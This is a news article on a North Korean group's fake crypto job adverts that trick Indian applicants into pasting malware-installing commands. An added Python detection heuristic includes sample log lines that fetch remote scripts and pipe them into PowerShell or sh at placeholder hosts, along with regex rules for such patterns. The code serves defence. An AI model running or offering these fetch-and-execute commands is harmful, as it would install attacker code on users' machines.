North Korean Hackers Target Indian Crypto Job Seekers With Malware
A lesser-known North Korean hacking group, Famous Chollima, has been aggressively targeting job applicants in India’s cryptocurrency and blockchain sector.
Unlike the notorious Lazarus Group, this faction employs crude but effective phishing tactics to trick candidates into installing malware on their computers.
The campaign, active since mid-2024, centres on fake job adverts and fraudulent skill tests designed to infect victims with malicious software called PylangGhost.
How Fake Job Offers Lead to Malware Infection
Famous Chollima operates by creating counterfeit recruitment websites impersonating well-known crypto companies such as Coinbase, Uniswap, and Robinhood.
The fake job listings lure professionals with experience in blockchain and crypto technologies to apply.
After filling out details and participating in supposed video interviews, applicants are prompted to copy and paste commands under the guise of installing video drivers.
The questions distributed by hackers were for an illegitimate Business Development Manager role, falsely presented as an opportunity at Robinhood. (Source: Cisco Talos)
Instead, these commands download malware that gives hackers full access to victims’ devices.
This malware targets sensitive information including login credentials, browser data, and cryptocurrency wallet extensions like MetaMask and Phantom.
For Windows users, the site presents instructions to copy, paste, and execute a malicious command disguised as a video driver installation, with a separate set of instructions also provided for macOS. (Source: Cisco Talos)
Cisco Talos researchers highlighted the use of a method called “ClickFix,” which exploits human problem-solving instincts by prompting users to fix fake error messages, ultimately executing harmful code.
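The ClickFix pattern just described (a victim pasting a "driver install" or "error fix" command that actually fetches and runs remote code) leaves a recognisable trace in process-creation telemetry. The following is an added detection example written for this page; it is not code from the article or from Cisco Talos. The log format, the rule weights, the alert threshold and the sample log lines are all constructed for the demonstration, and the domains in them are placeholders rather than indicators from the campaign.

```python
"""
Constructed example: a scoring heuristic over process-creation log lines that
flags interactive-shell launches whose command line downloads and immediately
executes remote content, the behaviour a ClickFix lure asks the victim to
perform. Not part of the original article; format, weights and samples are
assumptions made for this demonstration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    user: str
    parent: str
    image: str
    cmdline: str


# Shells the lure typically tells the victim to open (lower-cased basenames).
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "pwsh", "pwsh.exe",
                      "bash", "zsh", "sh", "terminal"}

# (rule name, regex applied to the command line, weight). Weights are constructed.
RULES = [
    ("download_tool",
     re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil\s+-urlcache|bitsadmin)\b", re.I), 2),
    ("pipe_to_interpreter",
     re.compile(r"\|\s*(sh|bash|zsh|python\d?|perl|iex|Invoke-Expression)\b", re.I), 3),
    ("encoded_powershell",
     re.compile(r"\s-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window",
     re.compile(r"\s-(w|windowstyle)\s+hidden\b", re.I), 2),
    ("tls_verify_off",
     re.compile(r"(--insecure|-k\b|--no-check-certificate)", re.I), 1),
    # The social-engineering pretext itself, as seen in the lure's "video driver" story.
    ("driver_pretext",
     re.compile(r"(video|camera|webcam)[\s_-]*driver", re.I), 1),
]
ALERT_THRESHOLD = 4  # constructed tuning value: one download alone is not enough


def parse_event(line: str) -> ProcEvent:
    """Constructed format: ts|user|parent_image|image|command_line.
    maxsplit=4 keeps any '|' inside the command line intact."""
    ts, user, parent, image, cmdline = line.rstrip("\n").split("|", 4)
    return ProcEvent(ts, user, parent, image, cmdline)


def score_event(ev: ProcEvent):
    """Return (score, matched rule names); non-shell images are ignored."""
    if ev.image.lower() not in INTERACTIVE_SHELLS:
        return 0, []
    hits = [name for name, rx, _ in RULES if rx.search(ev.cmdline)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def scan_log(lines):
    """Parse each line, score it, and return the events at or above threshold."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"ts": ev.ts, "user": ev.user, "image": ev.image,
                           "score": score, "rules": hits, "cmdline": ev.cmdline})
    return alerts


# Constructed sample telemetry: two benign shell launches, one non-shell
# process, and two download-and-execute command lines of the ClickFix shape.
SAMPLE_LOG = [
    "2025-06-18T09:58:11Z|dev1|explorer.exe|cmd.exe|cmd.exe /c git status",
    "2025-06-18T10:00:00Z|dev1|bash|bash|curl -O https://example.invalid/report.pdf",
    "2025-06-18T10:05:42Z|dev1|explorer.exe|code.exe|code --install-extension ms-python.python",
    '2025-06-18T10:12:03Z|dev1|explorer.exe|powershell.exe|powershell -w hidden -c "iwr https://example.invalid/vd.ps1 | iex"',
    "2025-06-18T10:14:27Z|dev2|Terminal|zsh|curl -k -s https://example.invalid/fix_video_driver.sh | sh",
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ts']} user={a['user']} score={a['score']} rules={a['rules']}")
        print(f"    {a['cmdline']}")
```

A plain download scores too low to alert on its own, which keeps developers fetching files with curl out of the queue; it is the combination of fetch, pipe-to-interpreter and a hidden window or disabled certificate check that crosses the threshold. In a real deployment the same scoring would run over Sysmon event 1 or EDR process-start records, and a hit on a host belonging to someone who recently went through an online "skills test" is exactly the case worth an analyst's attention.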
How Does Famous Chollima Differ From Lazarus Group?
Though both groups originate from North Korea and operate within the crypto space, Famous Chollima’s approach is notably less sophisticated.
Cisco Talos noted the fake job adverts lack authentic branding and often include irrelevant questions, raising suspicion.
Example of the fake job adverts. (Source: Cisco Talos)
In contrast, Lazarus Group is known for highly coordinated and advanced cyberattacks, including large-scale crypto thefts.
BitMEX recently revealed that Lazarus employs a two-tier team system: a lower-skilled group to breach initial security and a higher-skilled team to carry out the thefts.
It’s possible North Korea’s cyber operations follow a similar structure across different groups, but Famous Chollima’s simpler tactics suggest early-stage or opportunistic efforts.
Are These Attacks a Prelude to Larger North Korean Crypto Schemes?
The true intention behind Famous Chollima’s campaign remains uncertain.
While the attacks may represent small-scale thefts, experts warn they could also serve as reconnaissance to better mimic legitimate job seekers or gain persistent access to crypto firms.
Past incidents reinforce this concern — in late 2024, Radiant Capital suffered a $50 million loss after North Korean hackers infected employees’ devices through malware disguised as a contractor’s report.
North Korean hackers have long targeted cryptocurrency professionals, especially those using Apple devices, which are popular in the industry.
The government reportedly benefits financially from citizens employed overseas and through crypto thefts enabled by such infiltrations.
What Should Crypto Job Seekers Do to Protect Themselves?
The ongoing campaign highlights the risks faced by job seekers in the rapidly growing crypto industry.
Experts recommend scrutinising recruitment portals carefully, avoiding running unfamiliar command lines, and employing strong security measures like multi-factor authentication and endpoint protection.
Monitoring browser extensions is crucial, as malware like PylangGhost actively targets crypto wallets and credential managers.
Is This Just the Beginning of a New Cyber Threat Era?
The rise of groups like Famous Chollima signals that North Korea’s cyber operations are diversifying beyond the Lazarus Group’s high-profile attacks.
While their methods may appear rudimentary, their focus on crypto professionals could pave the way for more sophisticated infiltration tactics in the future.
With job seekers unwittingly providing backdoors into blockchain firms, the line between recruitment and espionage is dangerously blurred.
The evolving threat demands vigilance not just from individuals, but from the industry at large, as attackers probe new vulnerabilities through the very workforce meant to build it.